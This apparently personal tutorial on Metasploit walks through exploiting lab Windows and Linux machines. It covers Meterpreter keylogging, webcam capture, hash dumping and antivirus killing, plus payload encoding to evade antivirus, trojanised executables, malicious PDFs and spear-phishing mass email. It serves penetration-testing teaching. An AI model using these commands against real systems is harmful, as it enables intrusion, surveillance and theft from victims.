Met As Ploit Guide
Met As Ploit Guide
Met As Ploit Guide
Table of Contents 1.Introduction about Metasploit 2.Metasploit Basics 3.Information Gathering 4.Exploitation 5.Introduction about Meterpreter 6.Post Exploitaton using Meterpreter 7.Metasploit Utilities 8.Meterpreter Scripting 9.Client Side Exploitation 10.Social Engineering Toolkit(SET) 11.Auxiliary module 12.Linux exploitation
Attribution 1.http://www.offensive-security.com/metasploit-unleashed/Main_Page 2.http://www.securitytube.net/ 3.http://www.metasploit.com/ 4.http://en.wikipedia.org/ 5.Various blogs and ethical hacking websites
Note:This document was solely made for educational purposes .Please do not use these methods for any kind of malicious activities or purposes (Intentional or Unintentional).
Chapter One
History of Metasploit
Metasploit was developed by a security researcher HD Moore in october 2003.He used perl scripting language to develop Metasploit.Metaspolit gained high popularity in information security field in a short time and this project was rewritten in Ruby programming language with more than 1,50,000 lines of code and version 3.0 was released in 2007.In 2009 Metasploit was acquired by a Security firm called Rapid7. Now it has more than 1000 exploits, 260 payloads,460 auxiliary modules which have been effctively been used for exploiting and doing penetration testing on the target system.
Requirements
For performing any pentesting we should set up our own lab. 1.VM Ware or Virtual Box. 2.Back Track R3 (Linux based operating system which is used for pentesting). 3.Metasploitable (Intentionally vulnerable operating system developed by the Metasploit developers). 4.Windows XP 5.Windows 7
Metaspolit Architecture
Libraries
1.Rex : It is the basic library for performing most tasks.It handles sockets and differnet types of protocols. 2.MSF Core :It Provides the basic API.Defines the metasploit framework. 3.MSF Base: It provides the friendly API. Provides simplified API's for use in the framework
Modules:
Payload: Payload is a piece of code that runs in the target system remotely. Exploit : Exploit is a piece of software,chunk of data or a sequence of code that takes the advantage of a bug of vulnerability. Auxiliary modules : This module is used for scanning ,fuzzing and doing various tasks. Encoder:A program which encodes our payloads to avoid anti virus detection.
Interfaces:
Metasploit has different interfaces to ease our tasks.We can do a variety of tasks with these interfaces. 1.MSFConsole :This is the main interface we use throughout this document.open terminal type msfconsole. You can get a window like the below screenshot.
Msfconsole eases all our tasks compared to other interfaces.I will explain all the commands which we can use in msfconsole interface in the metasploit basics chapter.
2.MSFCLI
This is the sample usage of msfcli interface.msfcli gives more importance to scripting and interpretability.It directly runs command line.It is a fantastic tool when you know the exact exploit and payload.
Usage:
open 1.Terminalmsfcli -h 2.msfcli windows/smb/ms08_067_netapi O it displays various options 3.msfcli windows/smb/ms08_067_netapi RHOST=192.168.217.131 P RHOST is the remote host,we should type the victim's ip address P- Payloads 4.msfcli windows/smb/ms08_067_netapi RHOST=192.168.217.131 PAYLOAD=windows/shell/bind_tcp E This will exploit the windows xp pc and we get a shell.
3.Armitage
Armitage is the graphical GUI version for metasploit.It was developed by Raphel Mudge.In armitage we can open more than one terminal and search our exploits either GUI or CUI at the same time.
Usage:
open terminaltype Armitage it will display the above window.we can search our exploits using the attacks tab and search for the appropriate payloads for that exploit The armitage windos below displays metasploit CUI version and above GUI version you can view video tutorials about armitage in the link below. http://www.fastandeasyhacking.com/manual
4.MSFGUI:
It is better to use the msfconsole rather than other interfaces because it give more power to our pentesting tasks.
Metasploit Editions:
Metasploit provides a community editon free of cost to everyone,the remaining two editions cost more.Giant security consulting firms are using express and pro editions because those edtions are too costly.
Chapter Two
Metasploit Basics
To become familiar with the metasploit framework one should know the basic commands of metasploit.Metasploit commands are classified into 2 types 1.Core commands 2.Database commands To open metasploit,open terminal type msfconsole.
1.Core commands
To open these commands type ? Or type help in the metasploit console.Now i will explain the important commands that will help in the exploitation.
Useful commands 1)back : To come back from the current exploit or module
you can see i am getting back from the exploit(ms10_002_aurora) to msf main window.
3)connect :This command is used to connect to the host.we should specify the host ip
address and port number along with this command.
4)exit and quit: These commands are used to exit from metasploit and it comes to the
root.
5)irb:This command is used to drop a irb mode.Using this mode one can write one's own
ruby scripts.
6)info:This command displays the whole information about the selected exploit.
8)unload:This command is used to unload the loaded plugin from the framework.
10)resource: This command is used to run specific commnads from a specified file.we
should give the file path along wiht this command.
13)set and unset: These commands set variables.By using these commands we can set
our payloads and we can set ip address.
using unset we can unset the value and we can give the new ipaddress.
14)setg and unsetg:These commands are used to set our variable globally throught our
pentesting.
15)show :This command is used to view the options or modules.It is a very useful
command.
Database commands : Database commands are very useful to maintain huge data and
export that data into files.We can share data among our pentesting team and we can collaborate that data. By default,metasploit comes with postgress database
2)db_disconnect: To disconnect from the database.Here you can see the status as no
connection.
4)creds:This command is used to view the credential stored in the system.This command
shows the hashed passwords.
5)db_import:To import the files from various softwares like nessus and nexpose. 6)db_export:To export our results to other softwares. 7)hosts:This command will display the connected hosts .
8)db_nmap: Nmap is a very useful tool for pentester and network engineers.We can do
many tasks using nmap tool . eg:db_nmap -O 192.168.217.131.It displays the services and operating system info.
Chapter Three
Informaiton gathering
"If I had eight hours to chop down a tree, I'd spend six hours sharpening my axe". - Abraham Lincoln Information gathering is the first step in penetration testing.In this phase we can gather as much information as possible about the target.The more information we have,the more is the chance of exploting.In this phase we can gather information like ipaddress,services if the target is a website then we should gather sub domains,emails,hosting server and location of the server inforamtion. There are 2 types of information gathering 1)Active information gathering 2)Passive information gathering
Passive information gathering: In this technique we are not directly interacting with
the target.we will search information using whois and nslookup commands.There are many tools available in Back Track to find the dns information.
Whois :This command is used to gather the subdomains informaiton and registrar name.
These are only few techniques discussed.There are many more to gather information in a passive way.
Now we are performing null scan to trick the firewalled system and to get the response from that system.
You can combine bothe -O and -SV options at a time usage: nmap -O -sV 192.168.217.131 These are some nmap commands to find the target services and open ports and operating system info.There are many other advanced options that exist in nmap.I highly recommend a book "nmap cookbook" to know more about nmap and explore many options that exist nmap.
Chapter Four
Exploitation
Exploitation is the meridian for every security engineer.It is a great feeling to exploit a first machine and get full control over that machine.Exploitation is a very difficult task to accomplish.we need to know much about the target.In this chapter i will show you advanced techniques to get shell on the target system and you will gain full control over the victim system. Before reading this chapter please read chapter two to know the basics of metasploit.I am going to use the msfconsole throught out this chapter. Basic exploitation: I am going to use ms08_067_netapi exploit.you can get much information about this exploit in the below link.
http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi
Metasploit has a great feature tab completion.If we dont know about particular exploit press tab twice it to get some suggestions displayed.
You can see it displays various exploits.Or you can search for particular exploit using search command.
show: show command is used to view various exploits,payloads,encoders . Usage: show exploits,show payloads, show encoders. Steps to exploit our first windows machine. Step 1: use exploit/windows/smb/ms08_067_netapi. Step 2: show options to view various options.
RHOST(Remote Host):It is the remote host,we should type the remote ip address of the
target system.
LHOST(Local Host):It is the local host , that means our system ip address.
Step 3: set RHOST 192.168.217.131 Set and setg : Using these commands we can set the variable to a particular field.
Setg command is used to set a varialble globally.so we can use that variable throught out penetration test.
You can see a huge payload list.Now we will use a payload bind shell.It directly binds with the target port 445 .
Step 5 :To get the shell on the target computer, use the command "exploit".This command runs
the payload against the target system.Then you will get a remote shell on the target system.
Usage: exploit.
For confirmation, you can check the ip address of the remote system just by typing "ipconfig"
Congratulations! you have exploited the your first windows machine.Now you can create your own folders and and run the files remotely on the target system.To give more power to exploitation we willl user meterpreter payload.I will disscuss this payload in later.
Chapter Five
Introduction about Meterpreter
Meterpreter is the forerunner product in Metasploit framework which is leveraged as a payload after exploitation.Meterpreter is used to enhance the post exploitation.
Features:
It does not create a new process and completely resides in the memory.So there is no chance of detection.It does not write any data on the disk.All the communication from the attacker to the victim is completely encrpyted.It creates a separate channel to encrypt the data. Meterpreter has huge options to ease our post exploitation.We can gain full control over the victim system.
In this we follow the same procedure as the above exploitation,except the payload.Here we will use meterpreter as the payload to get the meterpreter shell.
Step 2:
Step 3 : Setting the meterpreter as paylaod. Usage: Set payload windows/meterpreter/bind_tcp Step 4: run "exploit" command.
Here you got Shell as meterpreter.you can do a variety of tasks using this shell.I will explain those in the later chapters. Here is the list of commands.
These are only few commands .There are many more.In the later chapter you will come across all those commands.
Chapter Six
1) Core commands:
2) System Commands:
5)Networking commands:
6)Priv commands
1)Core commands:Core commands are basic meterpreter commands. 1)Background:This commands are used to background a meterpreter session and we
will come back to the exploit module. To view the available sessions "sessions -l" To interact with the seesion we have to use "sessions -i 'session id' eg: sessions -i 1
5)use : This command is used to load a particular extension into the framework.It is like
the load command in metasploit. Usage: use espia
6) run: This command is used to run a meterpreter script. Usage:run script name eg: run checkvm
7)irb:This command is used to drop into a ruby shell where we can create ruby based
scripts.
8)Channel commands:Channels are very useful to execute our commands on the target
system.The communication in the channels are encrypted.we can read,write and interact with the channels. To create a channel we have to use execute command. Usage :execute -f explorer.exe -c
Channel -w :To write data into a particular channel we will use this commnad.
Usage: channel -w 2(1 is the channel number)
File system commands: 1)pwd:It displays the print working direcory and 'cd' command is used to change the
directory.
3)cat:This command is used to read the contents in a file.In 'ls' you can find two files
namely credit card and email password.I intentionally created them, to demonstrate how awful it is to save confidentendial inforamation without encrypting.
So do not save your confidential information into text files and do not write passwords any where.If you want to write,then encrypt those files.True encrypt is a good software to encrypt any kind of files.
Search:This command is used to search files in a folder or drive.We can also specify the
type of file to search eg. Doc,txt,pdf
Networking commands: 1)arp: To display the host arp cache and host information.
Route:It is used to display the routing table information.This command is very useful in
pivoting concept.
Usage :route -h
System commands: sysinfo:This command is used to view the target system information.
Ps:This command is used to display the process running in the target system.
Reboot:This command is used to reboot the our target system. Shutdown:This command is used to shutdown the remote system. Shell:This command is used to drop a shell in the remote system.
Token impersonation:
Token impersonation is a very important concept in meterpreter.Windows token are just like web "cookies". They are like temporary keys which just hold an object security inforamtion for the entire login that they do not have to provide their credentials each time when accessing a file or an object.There are two types of tokens available 1)Delegation token 2)impersonate token
1)Delegation token:Delegation tokens are used for interactive login such as logging into
our windows machine and connceting to remote desktop.
Usage:list_tokens -u
You can see 4 delegation tokens and 1 impersonate token are availabe .Quickly check who we are using 'getuid' command.
Usage: getuid
Impersonate:
You can see in delegation tokens KALEEM-27A12BDC\ADMINISTRATOR token availabe.Now i am going to impersonate like that user.
eg: impersonate KALEEM-27A12BDC\\ADMINISTRATOR You can see i impersonated as KALEEM.you can see user user id using 'getuid' command.
Steal token:
You can steal token from other users. Usage: steal process id eg: steal 1234
drop token:
You can drop token to get back.You can see in the below picute,first I impersonate as kaleem and I used drop token command to get back to NT AUTHORITY.
Usage: drop_token
rev2self:
This command is also used to get back to the old user. Usage:rev2self
getprivs: This command is used to get all the available privileges on the victim machine.
User interface and web cam commands: idletime: This is used to view how long our victim is away from the system,meaning he
doesnot interact with keyboard or mouse.
Keylogging:
All of us very are curious about what the victim is typing in his system and how to recored all those keystrokes.Metasploit developers have done a great job to write an inbuilt keylogger.We can monitor all the keystrokes typed by our victim. Ther are 3 commands available in meterpreter.
keyscan_start: To start a keylogger on the victim machine. keyscan_dump: To dump all the keystrokes typed by our victim. keyscan_stop:To stop the keylogger on the victim's system.
I performed all these commands on my victim machine(windows xp).You can view them in the below picture.
Uictl:This command is used to control the victim's keyboard and mouse.We can disable
their keyboard or mouse remotely.
Screenshot:
We can grab screen shots of our victim's machine.We can view what the victim is viewing.You can see my windows machine desktop here.
Usage: screeenshot
Webcam commands:
Another interesting commands are webcam commands.You can view the victim remotely.I do not have a webcam in my laptop(i am using a pretty old one).You can try this command in your system. There are two commands are available.
1)webcam_list: To view list the list of webcams. Usage:webcam_list 2)webcam_snap:To take the snap shot of our victim. Usage:webcam_snap
I have got an error because I do not have a webcam on my laptop.It will work if you have one on yours.
Priv commands:
These commands are used to escalate privileges and to get all the available previleges on the victim machine. Getsystem: This command is used to get privileges on the victim system.
Usage: getsystem
hashdump:This command is used to dump all the hashed passwords from the victim
system.
You can use crack the hashed passwords using psexec exploit or jtr_crack_fast.
Usage: timestomp -h
Usage: timestomp path of the file -c "MM/DD/YYYY HH:MM:SS" Eg: timestomp c:\\creditcard.txt -c "08/20/1970 12:12:12"
We can set the modification time of a file.To do this use '-m' option.
Usage:timestomp path of the file -m "MM/DD/YYYY HH:MM:SS" Eg: timestomp c:\\creditcard.txt -m "09/12/2015 12:13:24"
Usage: timestomp path of our file -f path of existing file Eg: timestomp c:\\creditcard.txt -f c:\\ntldr
Chapter Seven
Metasploit Utilities
Metasploit comes with two utilities to genearate shellcode and to evade antivirus detection.Using these utilities we can stealthily do the exploitation. There are two types of utilities 1.Msfpayload 2.Msfencode
1.Msfpayload:
Using msfpayload we can generate shellcode executables,and we can use that shellcode outside the framework.We can generate payload according to our format.we can create C,Ruby,Javascript and exe many types of formats.
step 2:
Here i filled the options LHOST AND LPORT and created .exe type payload. Next i am going to use multihandler exploit to attack.
Msfencode:
The payload which we have generated using msfpayload is fully functional and if victim scans with the help of an antivirus,it could be detected.Antivirus softwares look for signature to scan,so the shell code is detected by the antivirus. To evade this , metasploit developers have done a great job to introduce a new utility called msfencode.Using this we can encode our shell code with various encoders to bypass antivirus detection.
Usage :msfencode -h
There are different kind of options available to use. Important options -c -------------- means count how many no. of times we are encoding eg : -c 5 -------means i am encoding 5 times. -e---------------Name of the encode we use eg: -e x86/alpha_upper -o-------------- Give out file name eg: -o payload.exe -t---------------Type of format eg: -t raw -x-------------- Option to give alternative templete. Eg: -x notepad.exe -k-----------The given temple opens and our payload runs in new process. Eg: -x notepad.exe -k The victim is shown the notepad when he opens the file but that payload runs stealthily on the background.
These are a list of available encoders .We can encode our payload using any of the above encoders to evade antivirus detection. The very good encoder is shikata_ga_nai it is a polymorphic encoder.
msfpayload------------------------------Command to generate payload windows/meterpreter/reverse_tcp--- meterpreter payload LHOST------------------------------------My backtrack system ip address LPORT-------------------------------------Port number to bind R | -------------------------------------------'R'means raw type of input,I used wiht pipe symbol.This pipe symbol appends the msfpayload output msfencode. Msfencode----------------------------------- Command to encode our payload -e----------------------------------------------- "-e" is used to before the name of the encoder. shikata_ga_nai------------------------------ Name of the encoder. -t exe------------------------------------------ "-t" is used to tell what type of extension we are using.Here i am using .exe extension. > payload.exe------------------------------- output file name is payload.
LPORT=444 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 8 -t raw | msfencode -e x86/shikata_ga_nai -c 9 -t exe >payload.exe
Explanation
In the above command I have used 3 encoders.I have differntiated 3 of them in different colours. Red colour: msfencode -e x86/shikata_ga_nai -c 5 -t raw I encoded shikata_ga_nai encoder 5 times and type of output is raw. Green colour: msfencode -e x86/countdown -c 8 -t raw I encoded countdown encoder 8 times and type of outpur is raw Pink colour: msfencode -e x86/shikata_ga_nai -c 9 -t exe I encoded shikata_ga_nai encoder 9 times and type of output is exe I did all these encoding to evade antivirus detection.This is called multi encoding because i used many encoders to encode my payload.
Explanation:
I encoded my payload with shikata_ga_nai encoder 5 times and type of output is .exe. -x putty.exe --------- This is custom executable templete -o payload.exe-------Output file and the name of file is payload -k-----------------------It create a new process and run stealthy in the background
Chapter Eight
Meterpreter scripting
Meterpreter has many inbuilt scripts to complete our difficult task with using just a sample script.We can create our own scirpts using ruby language and run those scripts after exploitation.
You can see sample scripts in the above picture.There are more than 200 scripts available in metasploit to do our post exploitation.Now i will discuss some important scripts. 1.checkvm 2.credcollect 3.keylogrecorder 4.vnc 5.webcam 6.getcountermeasure 7.killav 8.scraper 9.enum_firefox 10.file_collector 11.arp_scanner 12.gettelnet 13.hostedit
To execute a particular script you should use the "run" command along with that script name.
Usage: run checkvm 1)checkvm :This script is used to check target is runnig or virtual machine or not.
2)credcollect:This script is used to collect the hacked passwords. Usuage :run credcollect
3)keylogrecorder: This script will record all keystorkes which has typed on the victim
system.
4)vnc:This script is very useful script.It gives remote desktop connect on the remote
system.you can see my windows system here. Usage : run vnc
7)killav:This script kills the antivirus on the victim system. Usage :run killav
8)Scraper:This script is very handy.It will download all the system informtion and all the
registry information.
9)enum_firefox:This script will gather the stored passwods and cookies in the firefox
browser on the victim's system.
Usage: run enum_firefox 10)file_collector:This script is used to gather existing files on the target system.We can
gather doc,pdf and text files using this script.
I used many optins to search files, you can see various options using -h option -d --------- To search a particular direcotory -f -----------To search a particular file type.Here i am searching text files. -r-----------To search recursively
11)gettelnet:This script enables the telnet session on the remote pc. Usage :run gettelnet
12)arp_scanner:This script is used for pivoting and portforward and we can enumerate
local interfaces using this script. Usage : run arp_scanner
13)hostsedit:This script is used to edit host file into the remote system.
Chapter Nine
Countermeasures:
1.Update your antivirus and antispyware software. 2.Update your operating system and web browsers on a regular basis. 3.Update your pdf reader (eg abode,foxit),flash players(quicktime,flash),word document readers(MSword). 4.Do not visit atrocious websites. 5.Download softwares from genuine websites because some websites offer spyware software. 6.Mozilla and chrome users can use security addons like WOT(Web Of Trust),NoScript and Better Privacy.
Browser based exploits:In this module our main target is browser.Now i will
demonstrate an infamous exploit Aurora.
Type "show options"to view different options.we have to set SRVHOST,SRVPORT and URIPATH.
Step 2:
1)I am setting SRVHOST as my local address.This is my system's ip address. 2)I am setting SRVPORT as 80 3)I am setting URIPATH as / 4)I am setting meterpreter reverse_tcp as payload. 5)To view different options type show options
Step 3
1)I am setting LHOST to my ip address 2)To run the payload on the remote system type "exploit" Step4: 1.Malicious URL has created.Now we have to send that url to victim.you can see i have opened that url inmy windows xp(victim)system.
3.You can see my windows system has been compromised. 4.You are greeted with meterpreter shell. This exploit has been working flawlessly on internet explorer 6 version. So it is better to update your browser.
I am using adobe utilprintf exploit.Type "show options" to view different types of options. Step 2:Change the file name Usage: set FILENAME book.pdf
Malicious pdf has been created and it is saved in /root/.msf4/local/book.pdf directory. Copy that pdf to your desktop.Use "cp" command to copy the malicious pdf & send that pdf using some social engineering techniques.
Step 4: Setting up a listener Usage : use exploit/multi/handler and set meterpreter as payload.You should use the
same payload as above.
Type "exploit" to start the payload handler.when ever the victim clicks the malicious pdf you will be greeted with a meterpreter shell.
Step 6 :
You can get meterpreter shell on your windows xp machine.We also have exploits in Microsoft word and excel with latest version 2007 and 2010.
Countermeasure:
1.Update your pdf readers and word readers. 2.Do not open malicious attachements from unknown persons.
Chapter Ten
Spearphising Module:
This module allows you craft email messages and send them to a large number of people or a single email address.In this attack we will perform fileformat exploits.We will send an email to a person with an attachement like adobe reader or zip file format.when the victim clicks on the attachment their system will compromise.We will get a shell on that system.
Step 2: Choose spear-phising attack vector.You can see various other modules are also
available.You can try all those by yourself.It is very easy to use social engineering tookit.No need to remember commands to use this toolkit. The GUI is very user friendly.
Step 3: Choose "perform mass email attack option" , it will display various file format
exploits.
Step 4 :We are selecting adobe reader buffer overflow vulnerability.You can see
diffenrent payloads have generated according to our exploit.
Step 5:The payload has generated.Now choose first option to keep the same file name or
else you can use your preferable name.
Step 7:Here i am choosing status report as my template and i am giving the victim's
email address. Next give your email address.You can give gmail,yahoo,hotmail email address.You have to set these options in SET config file and type the password for your email. You should install "sendmail" package in your backtrack.If not you can install using "apt-get install sendmail" command.You should change the option SEND_EMAIL=OFF to SEND_EMAIL=ON in SET config file.
When the victim opens your email and opens the evil attachement,their system gets compromised.you have to set a listener to get a shell.
Step 8: How to set up a listener ? You have to use an exploit to listen. Steps
1) use exploit/multi/handler 2) set payload windows/meterpreter/reverse_tcp 3) set LHOST "Your system ip address" eg: set LHOST 192.168.217.133 4) set LPORT "Give a port number to listen eg :set LPORT 1234 5) exploit when the victim opens your attachment you will be greeted with a meterprete shell after which you can do many tasks.
Countermeasures:
Do not open malicious links from suspected or unknown people.Use addon WOT(Web of Trust).Update your antivirus on a daily basis. In SET you have many modules.One of them is "Website Attack Vector" module.In this module you can do "Metasploit Browser Exploitation","Java applet attack","Man in the middle attack" "Tabnapping attack" and many more .
Chapter Eleven
Auxiliary Modules
Auxiliary module are not exploits.When we hear about metasploit we always think about how to get a shell on a remote system.But in Pentesting we have to do many tasks like scanning the remote host,finding open ports ,server configuration and misconfiguration . In metasploit framework we have more than 560 auxiliary modules which include 1) Scanners 2) Fuzzers 3) HTTP 4) server 5) Dos and many more.I will show you how to work with auxiliary modules.You can acces auxiliary module using below navigation. Usage: cd /opt/metasploit/msf3/modules/auxiliary#
This is the main folder structure .All our auxiliary modules are arranged in good manner.We can use it accordingly.
Usage: Use auxiliary/ press tab twice you can see a list of auxiliary modules
Portscanners:
Port scanners are used to see which ports are open on the target system.Now i am using a tcp port scanner to open ports on my windows xp system.
Usage:use auxiliary/scanners/portscan/tcp
Type "show options" to view available options
Set remote ip address -----set RHOSTS 192.168.217.131 Change port numbers------set PORTS 1-1000
1.Set remote hosts-----set RHOSTS 192.168.217.131 and type "run" to run the module.
There are many scripts availabe to do make simple.You can try many other scripts according to your need.
Chapter Twelve
Linux exploitation
So far,you have seen windows exploitation .Now i will show you how to exploit linux operating system.In this chapter we will use metasploitable 2 which is intentionally vulnerable ubuntu linux based operating system.This operating system was developed by metasploit developers for security professionals to practise their tools on this operating system. It has vulnerable web applications "mutillidae and DVWA(Damn vulnerable web application) they contain all the vulnerabilities of OWASP top 10 and many more.You can download metasploitable 2 from the below link. https://sourceforge.net/projects/metasploitable/files/Metasploitable2/ After downloading from the above link you can install it in your Vmware.After system boots up you can login in your metasploitable 2 using username msfadmin and password msfadmin. First,we have to know the ip address,.Just type 'ifconfig' to know the ip address.Then go to your backtrack machine , use nmap tool to scan open ports and services to know which services are running in the metasploitable 2 machine.
Scanning with nmap: We have to use nmap to scan open ports and services running. Usage : nmap -sT -v 192.168.217.136(Metasploitable ip address).
You can see many services running.Now i will choose an exploit UnrealIRCD IRC daemon.This version has backdoor and it is running on 6667 port. Now search for this exploit
You can see only one exploit is available and you can see that the rank is excellent.
Exploit 2: distcc_exec:This program makes it easy to scale large compiler jobs.You can know more
about this exploit in the below link. http://metasploit.com/modules/exploit/unix/misc/distcc_exec Step 1: use exploit/unix/misc/distcc_exec
Conclusion: That's all I have on my mind for this document.I would warmly welcome your feedback (either positive or negative).I need your suggestions which would help me move further.Thanking you very much for reading this document.Practise all the commands so as to gain confidence & command over metasploit.Please do not violate any security rules and do not do any malicious activity with these techniques(I hope u really would'nt).All techniques which I have mentioned here were executed on my laptop.If you have any queries,concerns please feel free to contact me(below given are my contact details).Finally, I would like to conclude with an excellent quote: " There is no security in life, only opportunity". - Mark Twain About me: I , kaleem shaik , am working as an ASE(Assistant Systems Engineer) in TCS.My areas of interest are 'Ethical hacking' , 'Penetration Testing' and anything & everything in relation with 'SECURITY'. Contact Details: Name : Kaleem Shaik Email : kaleemshaik786@hotmail.com